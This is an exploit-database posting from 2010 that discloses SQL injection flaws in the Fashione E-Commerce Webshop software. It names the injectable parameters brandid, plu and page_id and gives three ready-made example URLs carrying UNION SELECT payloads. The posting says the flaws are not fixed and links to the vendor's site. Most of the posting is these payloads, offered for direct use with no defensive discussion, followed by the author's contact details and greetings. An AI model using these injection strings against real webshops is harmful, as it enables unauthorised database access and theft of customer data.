Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability
# Published : 2010-09-19
# Author : secret
# Previous Title : Skybluecanvas.v1.1-r248 CSRF vulnirabilitie
# Next Title : MOAUB #22 - gausCMS Multiple Vulnerabilities

   ________  _____________  / /_
  / ___/ _ / ___/ ___/ _ / __/
 (__  )  __/ /__/ /  /  __/ /_  
/____/___/___/_/   ___/__/ #####################################################################

# Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities
# Date: 2010-09-19
# Author: secret
# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.fashione.co.uk/
# Version: All versions so far
# Tested on: XP

# Fixed? : NOT FIXED

----------------------------------------------------------------------------

[Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id="

e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4

e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4

e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4

################################################################################################

[THANKS TO]
 
ALLAH - ???? ?? ??? ?? ???
 
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION